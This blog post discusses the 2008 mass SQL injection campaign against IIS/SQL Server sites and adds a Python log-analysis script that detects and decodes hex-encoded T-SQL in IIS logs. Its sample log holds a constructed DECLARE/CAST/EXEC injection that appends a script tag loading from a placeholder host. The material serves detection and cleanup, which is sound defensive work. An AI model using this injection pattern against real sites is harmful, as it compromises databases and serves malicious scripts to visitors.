(George P. Alexander Jr.) I was catching up with my feeds and took note of Defence In Depth's Robert Vamosi's interview with Jeremiah Grossman of WhiteHat Security on April's mass SQL injection attack against IIS web sites running SQL Server as the backend. What caught my attention was that, until now, attackers would go after specific sites. This time they used a sophisticated tool that scanned the entire web for potentially weak sites running ASP.NET (and therefore, quite possibly, SQL Server) and then used a generic SQL Server feature on all of those sites to wreak serious damage.

The interview is an eye-opener about the massive effort required to clean up web sites compromised by this tool:

"Where it gets worse is it's going to be the cleanup effort. The cleanup after this compromise is going to require database administrators going back to their database and manually pulling out the infected database tables or reverting to a backup. Either way it's going to take days, weeks, and possibly months to actually clean up the code."

If you remember or were aware, April '08 ended with one of the worst SQL injection attacks ever carried out on a massive scale, affecting over half a million web sites. Though April was when the exploit gained notoriety, creating much shock and awe, the campaign had started back in January, and it continued into May. Affected sites included not just run-of-the-mill destinations but popular government web sites in the US, the UK and many other states, as well as organizations such as the United Nations and other legitimate web sites.

The inner workings of the attack go as follows: the attackers would look for .aspx pages that took query-string parameters and load those parameters with encoded T-SQL.
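As an added example (not code from the post or the podcast), the following Python script shows what encoded T-SQL looks like when it lands in a web server log and how a defender can pull it out, which is also the first step in working out which tables the DBAs must clean. The log lines are constructed, not a real capture; the field layout follows the IIS W3C extended format. The hex-encoded batch is a constructed illustration of the shape the post describes, a DECLARE/CAST/EXEC wrapper around a hex literal, and the decoded statement is likewise invented and shortened to a single UPDATE that appends a script tag to one column; neither is the payload from the 2008 attack.

```python
"""Find hex-encoded T-SQL in IIS W3C log lines and decode it.

Added example; the log lines below are constructed, not a real capture.
"""
import re
from urllib.parse import unquote_plus

# Constructed stand-in for the decoded payload: one UPDATE that appends a
# script tag to a text column. It is not the 2008 payload, only its shape.
PAYLOAD_SQL = ("UPDATE Articles SET Body=RTRIM(CONVERT(VARCHAR(8000),Body))"
               "+'<script src=http://example.invalid/x.js></script>'")

# NVARCHAR hex literals are UTF-16LE, which is why a plain grep for
# "<script" over the raw log never matches.
ENCODED = PAYLOAD_SQL.encode("utf-16-le").hex().upper()

# Constructed IIS W3C extended log: two ordinary requests and one whose
# query string carries a DECLARE/CAST/EXEC wrapper around the hex literal.
SAMPLE_LOG = (
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status\n"
    "2008-04-25 10:01:02 10.0.0.5 GET /news.aspx id=42 203.0.113.7 200\n"
    "2008-04-25 10:01:03 10.0.0.5 GET /products.aspx cat=3&page=2 203.0.113.9 200\n"
    "2008-04-25 10:01:04 10.0.0.5 GET /news.aspx "
    "id=42;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + ENCODED +
    "%20AS%20NVARCHAR(4000));EXEC(@S);-- 198.51.100.23 200\n"
)

SUSPECT = re.compile(r"\b(DECLARE|CAST|EXEC)\b", re.IGNORECASE)
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)


def decode_hex_tsql(hex_digits: str) -> str:
    """Decode a 0x... literal, guessing UTF-16LE (NVARCHAR) vs single-byte (VARCHAR)."""
    raw = bytes.fromhex(hex_digits)
    # ASCII text in UTF-16LE has a NUL in every odd position.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def parse_w3c(text: str):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def find_injections(text: str) -> list:
    """Return records whose query string carries T-SQL keywords, with hex literals decoded."""
    hits = []
    for rec in parse_w3c(text):
        # IIS logs the query string as sent, so undo the URL encoding first.
        query = unquote_plus(rec.get("cs-uri-query", ""))
        if not SUSPECT.search(query):
            continue
        hits.append({
            "time": rec["date"] + " " + rec["time"],
            "client": rec["c-ip"],
            "stem": rec["cs-uri-stem"],
            "query": query,
            "decoded": [decode_hex_tsql(h) for h in HEX_CAST.findall(query)],
        })
    return hits


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['stem']}")
        for sql in hit["decoded"]:
            print("  decoded T-SQL:", sql)
```

The keyword match alone is enough to flag the request; the hex decode is what tells you which tables and columns were written to, which is the information the cleanup Grossman describes depends on. The UTF-16LE guess matters because an NVARCHAR literal hides every ASCII character behind a NUL byte, so signatures written against the decoded text never fire on the raw log. Whether the injected batch runs at all depends on the page concatenating the parameter into dynamic SQL; a parameterized query passes the same string to SQL Server as data and nothing executes.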